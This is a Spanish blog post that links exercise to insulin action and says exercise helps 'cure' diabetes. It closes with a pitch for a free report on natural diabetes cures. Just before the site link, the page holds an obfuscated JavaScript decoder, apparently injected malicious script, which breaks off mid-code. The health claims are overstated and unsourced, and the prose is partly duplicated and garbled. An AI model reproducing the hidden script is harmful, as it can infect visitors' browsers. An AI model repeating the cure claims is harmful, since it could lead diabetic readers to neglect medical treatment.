La intima conexión entre el ejercicio y el curar la diabetes.

Te has preguntado alguna vez ¿En que influye el ejercicio con la hormona de la insulina?

Se ha visto que el hacer ejercicio tiene un efecto muy similar a la insulina en el cuerpo. Ya que cuando se hace ejercicio los músculos van a estar requiriendo un flujo constante de azúcar para poder mantener el movimiento.

Te has preguntado alguna vez ¿En que influye el ejercicio con la hormona de la insulina?

Se ha visto que el hacer ejercicio tiene un efecto muy similar a la insulina en el cuerpo. Ya que cuando se hace ejercicio los músculos van a estar requiriendo un flujo constante de azúcar para poder mantener el movimiento. El ejercicio lo que hace es ir incrementando la velocidad en la que nuestros músculos toman el azúcar de la sangre, por lo tanto el ejercitarnos actúa igual que la insulina ya vacía el exceso de azúcar que tenemos en nuestra sangre.

Esto hace que el azúcar se reduzca el azúcar que habita en la sangre. Caminar alrededor de 20 minutos diarios te da la posibilidad de bajar 20 puntos en tus niveles de glucosa. Para explicarte como es la insulina podemos imaginarnos que la insulina es como un autobús y la glucosa son los pasajeros.

Al realizar ejercicio los músculos tienden a realizar trabajo mucho más intenso de lo que normalmente se realiza y va estar requiriendo mucho más combustible de lo que normalmente se requeriría, de esta forma los músculos comienzan a enviar a sus autobuses para ir por la glucosa (el azúcar) para transportarlos hacia los músculos. Y los músculos que están trabajando arduamente para hacerse responsables de la insulina pueden estarles enseñando a los autobuses la forma en la que se debe de estar realizando dicho trabajo, es decir, recoger a los pasajeros.

Por esto y muchos motivos más, es que el ejercicio tiene muchísimos beneficios para aquellos que padecen de diabetes. Para empezar se va incrementando la forma en que se capta la glucosa por las células, se va mejorando la sensibilidad para la insulina por el simple hecho de ir mejorando el metabolismo de la glucosa y se va reduciendo cada vez más el riesgo de contraer alguna enfermedad cardiovascular. Al ir aminorando los niveles de glucosa en la sangre se va mejorando la sensibilidad que se tiene a la insulina, haciendo que esto sea cada vez mucho más eficaz.

Adicionalmente gracias al ejercicio se puede ir aminorando cada vez más las dosis que se van ocupando para la medicación y así ir perdiendo cada vez más el peso corporal si aunado a esto lo mezclamos con una mezcla.

Hay 2 mitos que he escuchado mucho sobre la diabetes:

Mito #1 – Si estoy delgado, me encuentro bien de salud.

La realidad es que la diabetes es algo que les puede dar a personas con cualquier tipo de cuerpo. Si es real que la diabetes tipo 2 es más propensa hacia las personas con sobrepeso pero esto no significa que el cuerpo sea un factor 100% decisivo.

Mito #2 – El ejercicio no me va ayudar en absoluto.

La realidad es que la Asociación Americana de Diabetes recomienda por lo menos realizar ejercicio durante 20 minutos al día durante 5 veces por semana, ya que al hacer ejercicio 2 horas a la semana reduce de forma considerable el padecer de diabetes.

La realidad es que más del 90% de los casos de diabetes se puede prevenir y uno puede mantenerse sano llevando una dieta balanceada y realizar ejercicio regularmente. Si actualmente ya padeces de diabetes y estás buscando algún método natural para curarlo, yo te recomiendo descargarte nuestro reporte gratuito:

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandodiabetes.com/" class="external" rel="nofollow">www.CurandoDiabetes.com

Deja tu comentario debajo

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.